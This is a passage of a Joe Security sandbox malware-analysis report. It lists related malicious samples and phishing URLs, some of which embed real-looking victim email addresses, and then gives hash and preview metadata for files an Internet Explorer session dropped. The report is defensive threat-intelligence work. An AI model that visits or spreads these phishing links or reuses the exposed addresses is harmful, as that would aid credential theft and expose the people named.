Get hash malicious Browse 192.229.221.185

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse 192.229.221.185

https://1drv.ms/b/s!AhJu8bKGuybLclKouKsoIXrGDx8 Get hash malicious Browse 192.229.221.185

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&username=broberts@vocera.com

Get hash malicious Browse 192.229.221.185

login.live.com.office.flagstarbancorp.myshn.net Get hash malicious Browse 192.229.221.185

https://aus01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3D429413BE603FA343!5758%26authkey%3D!ABt3LPTU6MynWOk%26ithint%3Dfile%252cdocx&data=02%7C01%7Cdamienc%40australianballet.com.au%7Cf3dff5c1c69746509e0c08d6ef0bf767%7C363ab79152b7474a91175bf36bde2b94%7C0%7C0%7C636959232091196729&sdata=9I2tuU2dOpmt0o7AgOaq9Wuz9mjMhKAd7LA55pbkQqQ%3D&reserved=0

Get hash malicious Browse 192.229.221.185

https://1drv.ms/b/s!AvO7bN5acODYawc9teh52z5A8HI?e=3T7pcW

Get hash malicious Browse 192.229.221.185

https://outlookloffice365user23k-secondary.z14.web.core.windows.net/d41d8cd98f00b204e9800998ecf8427e89de54095edc1a5eb8c27bdf9c492019/89de54095edc1a5eb8c27bdf9c492019/#GBabineau@99restaurants.com

Get hash malicious Browse 192.229.221.185

https://onedrive.live.com/?authkey=%21AGoRsXinDPWY5Mc&cid=4694365C78123852&id=4694365C78123852%21134&parId=root&o=OneUp

Get hash malicious Browse 192.229.221.185

Match Associated Sample Name / URL SHA 256 Detection Link Context

Copyright Joe Security LLC 2019 Page 14 of 47

www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse 192.229.221.185

https://943d.app.link/ Get hash malicious Browse 192.229.221.185

https://protection.office.com/threatexplorer#/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https://onedrive.live.com/?authkey=%21AKOGMaypqRvjuxE&cid=30A2F54D2B9B8460&id=30A2F54D2B9B8460%21170&parId=root&o=OneUp

Get hash malicious Browse 192.229.221.185

CRY INV#98634.htm Get hash malicious Browse 192.229.221.185

Match Associated Sample Name / URL SHA 256 Detection Link Context

Match Associated Sample Name / URL SHA 256 Detection Link Context

unknown request.doc Get hash malicious Browse 192.168.0.44

FERK444259.doc Get hash malicious Browse 192.168.0.44

b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js

Get hash malicious Browse 192.168.0.40

Setup.exe Get hash malicious Browse 192.168.0.40

base64.pdf Get hash malicious Browse 192.168.0.40

file.pdf Get hash malicious Browse 192.168.0.40

Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40

request_08.30.doc Get hash malicious Browse 192.168.0.44

P_2038402.xlsx Get hash malicious Browse 192.168.0.44

48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22

seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40

Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40

QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40

pptxb.pdf Get hash malicious Browse 192.168.0.40

unknown request.doc Get hash malicious Browse 192.168.0.44

FERK444259.doc Get hash malicious Browse 192.168.0.44

b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js

Get hash malicious Browse 192.168.0.40

Setup.exe Get hash malicious Browse 192.168.0.40

base64.pdf Get hash malicious Browse 192.168.0.40

file.pdf Get hash malicious Browse 192.168.0.40

Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40

request_08.30.doc Get hash malicious Browse 192.168.0.44

P_2038402.xlsx Get hash malicious Browse 192.168.0.44

48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22

seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40

Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40

QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40

pptxb.pdf Get hash malicious Browse 192.168.0.40

Match Associated Sample Name / URL SHA 256 Detection Link Context

9e10692f1b7f78228b2d4e424db3a98c DOC1212122211111.pdf Get hash malicious Browse 192.229.221.185

https://cardinalhealth.finance/disribution/ Get hash malicious Browse 192.229.221.185

here.skynnovations.com/availible/ Get hash malicious Browse 192.229.221.185

www.bit.ly/uBbdpe4BxwwuRFnfWgrj?dyu=pascal.martinet@safety-cuttingtools.com&&25.63.34.80&&cc0_34k3=safety-cuttingtools.com&sr=pascal.martinet@safety-cuttingtools.com&NOI8E6JE=safety-cuttingtools.com&sc-3d=pascal.martinet@safety-cuttingtools.com&&7165&&cc0_34k3=pascal%20martinet&YY0G3FG=safety-cuttingtools.com&sc-3d=pascal.martinet@safety-cuttingtools.com

Get hash malicious Browse 192.229.221.185

store.zionshope.org Get hash malicious Browse 192.229.221.185

ASN

JA3 Fingerprints

Copyright Joe Security LLC 2019 Page 15 of 47

https://ware.in.net/pro/Onedrive/index.php Get hash malicious Browse 192.229.221.185

Updated SOW.pdf Get hash malicious Browse 192.229.221.185

www.egtenterprise.com Get hash malicious Browse 192.229.221.185

https://www.truesyd.com.au/000/Ovvice1/?VFSG!=Linda.Conacher@justice.wa.gov.au

Get hash malicious Browse 192.229.221.185

https://www.truesyd.com.au/000/Ovvice1/?VFSG!=Linda.Conacher@justice.wa.gov.au

Get hash malicious Browse 192.229.221.185

www.zionshope.org Get hash malicious Browse 192.229.221.185

Invoicepng (1).pdf Get hash malicious Browse 192.229.221.185

Review.xps Get hash malicious Browse 192.229.221.185

https://lootart.com/qtext/ Get hash malicious Browse 192.229.221.185

meadowss.gq Get hash malicious Browse 192.229.221.185

https://nameserverip.xyz/sgn/D2019HL Get hash malicious Browse 192.229.221.185

https://orlando.in.net/G5?POP!=jmarker@ckr.com Get hash malicious Browse 192.229.221.185

https://angleshelf.sharepoint.com/:b:/s/ShapiroMasseyLLC/EZ2wTj09HkpIouJm6biidOwBQ1TN1ia5jLFP6D3lYHu1_Q?e=KJ4ytm

Get hash malicious Browse 192.229.221.185

https://thedevcomp.net/pop/login/index.php Get hash malicious Browse 192.229.221.185

https://tryanmcv.com/login.php?l=_JeHFUq_VJOXK0QWHtoGYDw1774256418&fid.13InboxLight.aspxn.1774256418&fid.125289964252813InboxLight99642_Product-userid&userid=

Get hash malicious Browse 192.229.221.185

Match Associated Sample Name / URL SHA 256 Detection Link Context

No context

ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.

Dropped Files

Screenshots

Copyright Joe Security LLC 2019 Page 16 of 47

System is w10x64

iexplore.exe (PID: 4576 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2 MD5:

071277CC2E3DF41EEEA8013E2AB58D5A)cleanup

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B3F30D4-A233-11E9-AADA-C25F135D3C65}.datProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: Microsoft Word Document

Size (bytes): 33368

Entropy (8bit): 1.8703255075059053

Encrypted: false

MD5: 43DA58C7C3881105E3BC3BFAB5B2C624

SHA1: 2E15BB7A248FE3CA5CAC42BC5101F213E8EB7859

SHA-256: 5494620DF4A1B519CA7464D76F85AEE5184CBF3F11E1C4AD2B41166299621F84

SHA-512: 2CD96BC4688AC4ED567213F1A3FE976A0957F6C216296D6BA226C46F0613DA8D5BC2359D37307FCCC411D538D8041B3BE2ADE200B72B8F865F283ABF441A53C2

Malicious: false

Reputation: low

Startup

Created / dropped Files

Copyright Joe Security LLC 2019 Page 17 of 47

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B3F30D4-A233-11E9-AADA-C25F135D3C65}.dat

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6B3F30D6-A233-11E9-AADA-C25F135D3C65}.datProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: Microsoft Word Document

Size (bytes): 145638

Entropy (8bit): 3.31748929203143

Encrypted: false

MD5: 4D7CCC39C9B6C66E5EA0CA135271B236

SHA1: B9F25CC4339267086213C300302F85BF3C8DFC8A

SHA-256: E912519979650273645805E9CA60866A2DD6A77099CE4D0F1E6AD56ABA363CD0

SHA-512: 61BE585910487D5E2CF545C4DC42533AD53518BBA09091987414C78062733BF9965B65C7F3F01DF1BC253F92B3796A638363B682C565E9FAF8EEA9B496C90E0E

Malicious: false

Reputation: low

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{73B3FC37-A233-11E9-AADA-C25F135D3C65}.datProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: Microsoft Word Document

Size (bytes): 16984

Entropy (8bit): 1.5651325608710502

Encrypted: false

MD5: 507D396B22049D5BBE378C29A8E39748

SHA1: E0F898EFD82D39D9DB9936111C1254472625B3A9

SHA-256: 1CA37CF399CD8767708D6D2CF75C4B00E7AB9ED5DF93C2DF06FB2AFDD6D2C8BA

SHA-512: 3A0CB60D89AA66A24D2F1EEF52C2E11961578FF0A392469F5DE4408052CE2F06D9719E5ABF1D60075FF5ACBD8E82361579CA8ED06F6E803BCAFAEB92E4A9C9D3

Malicious: false

Reputation: low

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 656

Entropy (8bit): 5.092233081919978

Encrypted: false

MD5: F4274E75BC32AACB92BECB9B76F184B8

SHA1: 3F511E721E9C0E483F83E9ED214ED9A32DD826BB

SHA-256: 534162358D123C4CED1C0DCD6C53ED77B63C9433FCAD829AE2CB3FBBECFAB9F7

SHA-512: E91E40E8171F3105EAA3FD587E1530534E59573AD5174AC9ABCDC8111052BBAA595E9853B23FDF92E8B008D35139185BF20E8F7F94FE43EE6EFD2A909134B8E2

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x41ffd10d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x42027f75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 653

Entropy (8bit): 5.1183826834578765

Encrypted: false

MD5: 2C8906B52317C5877F7B4CD2EF6C45BD

SHA1: 88CB1EF93B12075D151DE8801E021A5F5D264B86

SHA-256: D1505E0F23D3E3811FF22FFD5128C88D3356D34053265A3E5BD62EB5767B093E

SHA-512: BC87F02926B97A7894E8C6AE292C2A5014807843D5B6407FE1D28B34BE99A3F3778C0C19B8D9B3F55CAECF92C1612ED4AAAEC02BDED5CB040CB210F332B4E982

Copyright Joe Security LLC 2019 Page 18 of 47

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41c1ad24,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41d57ed0,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 662

Entropy (8bit): 5.131340823983181

Encrypted: false

MD5: FAB148AC9F777CB82C1F2103AC509090

SHA1: 562ED02F68D604D153150A226DCD1DCCCA46554D

SHA-256: 26B18FDDDAA96EC66B709B528E0869D9141CC9BDA3072C73F213F6DED945FE9F

SHA-512: 3883F75C7FCEB4385B4093AF71E8FEE650B5CA45D499B975059D186E4AF293F4095FA16B02B8DB2AA6BE726BD3F76DEDA8591785D2DC9B529A6C038D770E53F1

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x42050801,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x420791db,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 647

Entropy (8bit): 5.115930101420065

Encrypted: false

MD5: 8B7BA4E727F8ACB8DB64EBF5FB230D25

SHA1: 16A8DF42F8A7FF577C9DFB56A77B1429EB086665

SHA-256: A8850950E052CD17673333599F098320C4D8EEB1136075DA8F88F1683AB643F8

SHA-512: 7C6F139B28A79E7DCB7CDE2BB34B157C0D0BFC6D526AB2C42FF0587694023F17E68603F6F0E3BC7030D191DC7B43ACFE341C20E490126AF011FAF1AEC64D3645

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f35f81,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f5d4eb,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 656

Entropy (8bit): 5.138443843506685

Encrypted: false

MD5: 4EF2A145D595A6E77BEAAF52BD2FDA7F

SHA1: B7E09DD6CFC440AB67880838928013D6CC30A850

SHA-256: 765CC8F692DA19011048F1EDF07A1B75BADF8A02082229E946B54EDBD785BFD6

SHA-512: 2C78ADFD8074C22D8900F00F46460CAAFAA1EED4BB4F29C5C55AAB14ABA4599A11C53ECCB6E20D5C3B43966D183904B47FDE6C85CF9EE20CE94653CD917C0707

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420cb48e,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420f3dc7,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 653

Entropy (8bit): 5.080045270510188

Copyright Joe Security LLC 2019 Page 19 of 47

Encrypted: false

MD5: 88632604F69B57E1882790DE6F5CFF7D

SHA1: E2EE8473409C5BD10C670A5EB0483C6BFD0949F3

SHA-256: E34369A12DA43B38E25C838A0865B884120F2B477B71BCA9777DDBCAF403E8ED

SHA-512: C0AE8E7BBE9806200E59D787D777B4C220E5C633E2185FD6CCD43953290E492EC3682A3462421AFA6357ED9426423F44AD07D0E3CAD189EE15C481DAEBBDD9EF

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41fd34f6,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 656

Entropy (8bit): 5.135533928686235

Encrypted: false

MD5: A02B5C2FFC9C50B512240E57C5146E4F

SHA1: 4BB63FDD58AA53851F95AD1DABF0F5B80452D3E9

SHA-256: 598BEB24024D238606506018EF51F26E86FF469EB1D576C26188F8C02302A1A0

SHA-512: 09C2B95C64860C96B3F9576ECBCA20352C3CAD8F5C15BDD73DB55E4C2AB8DFF224BA56733BE86B2638B732036AD8ADC3C4D7174E189AC27549181923464600F9

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41f84a1b,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 659

Entropy (8bit): 5.104813826095068

Encrypted: false

MD5: 18ADDFA8D7F62F04B4EB84C3A6271BBB

SHA1: 9544908050FEEAA9C7F3201DFD85C12BB11012D6

SHA-256: 421F93153E9B85D8FAD84927D3D0F8E349A4EE01BAC0DC2C95EA5F59E13DC922

SHA-512: AE72741B66FC9C288E4B6767E532FF28B3425401D7732FE87F2D95CF90D74E2933F4E6AAB91CC73DFD521B574D6A1A778DDF8160A1378400A1B8B8554D96D8EE

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e17dd5,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e4063d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 653

Entropy (8bit): 5.090773860921899

Encrypted: false

MD5: 82E65BDA761DB053CD7F5C2538B5D11F

SHA1: 0AEC3A18249F409B25F54553FB091AEECC6370D2

SHA-256: 34174AED141A4AE936CDDEC28DBD5AD06813680642E66D796CCE3B804BF17BAA

SHA-512: E57994CD8D7B343AA7CB9137E927AEFE78DAD17E334208BB869002F6832E2CA7A7F4A0247CD767F1927A99E7DBE5C7AE82CE9A1FD9F08F746F107736B45784E1

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ebd910,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ee4e75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

Copyright Joe Security LLC 2019 Page 20 of 47

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\6aw4uvh\imagestore.datProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 72284

Entropy (8bit): 3.0775400929565304

Encrypted: false

MD5: 0955EFE2855D2095B6429167AFFB0A5C

SHA1: 7BE788245F2FAFD22DB1165B3D9BAFDF0D51509E

SHA-256: 2137D1B12AE9618FEF47E861B2D0B3D7D464BB6C1B1DCE8AF7E84C184F2F40A5

SHA-512: E3083BF3B70950CD43AC86D9098F8F0302AC7DF2F6A29BFAD183CEF3B0F6DB1FE3EB05E5F32380037C9C859A2A71EA858590A204CA1A308683D07F40D865DB71

Malicious: false

Reputation: low

Preview: W.h.t.t.p.s.:././.a.a.d.c.d.n...m.s.a.u.t.h...n.e.t./.e.s.t.s./.2...1./.c.o.n.t.e.n.t./.i.m.a.g.e.s./.f.a.v.i.c.o.n._.a._.e.u.p.a.y.f.g.g.h.q.i.a.i.7.k.9.s.o.l.6.l.g.2...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...33333333333333333333

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\NewErrorPageTemplate[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1612

Entropy (8bit): 4.869554560514657

Encrypted: false

MD5: DFEABDE84792228093A5A270352395B6

SHA1: E41258C9576721025926326F76063C2305586F76

SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075

SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD

Malicious: false

Reputation: high, very likely benign file

Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\app[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators

Size (bytes): 344831

Entropy (8bit): 5.052152993582276

Encrypted: false

MD5: 677E66D9B62C449D01191132B1125AE3

SHA1: A6A31BC3B401638C95C5B587D5AC8D44627C0611

SHA-256: AC1E130CBDEC824CFB8EE8FFC2CC3218365FBA0B0C23D5DAC7A8B038C1176F46

SHA-512: 77B708FA7F8E3E262B43D6978079C4E930FFD9693B05314491155856CA9A65C0622108AA468ED86B8E18AE1CD67A1CB0755B62DEE39E8D1DD53D3D6C3856DF6B

Malicious: false

Reputation: low

Preview: @font-face {. font-family: "wf_segoe-ui_normal";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");. font-weight: normal;. font-style: normal; }..@font-face {. font-family: "wf_segoe-ui_light";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.ttf") format("truetype

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\arrow_px_up[1].gifProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: GIF image data, version 89a, 7 x 9

Size (bytes): 1305

Entropy (8bit): 3.799575332787369

Encrypted: false

MD5: BA32C65F44781F977BBB0B9F57413F48

SHA1: 3618723B0494B92619CE342EE7174EBAEFCD90D9

SHA-256: 3C3E5B3BFFB0A6122D4AD5818C7B609856B9CDC1527C7E19F8E4B042D30723E6

SHA-512: 13A1EC1F9F1651754E7494600C070D3560177B22A278652FEA9EBAC7EC71DD43A016D66CE83902A2B600DBF48F4CDD98D901F46B06084E1F20CD95AB8CED2B9D

Malicious: false

Copyright Joe Security LLC 2019 Page 21 of 47

Reputation: low

Preview: GIF89a...........3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............... .`.....\8....!>L(.b@.;.PNG........IHDR................a....sRGB.........gAMA......a.....IDAT8O.S;..A.........M6.4....@.47....^I..<."&..W..Y...Y...........m...E.<..$..n...j..kL&......}.j....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\arrow_px_up[1].gif

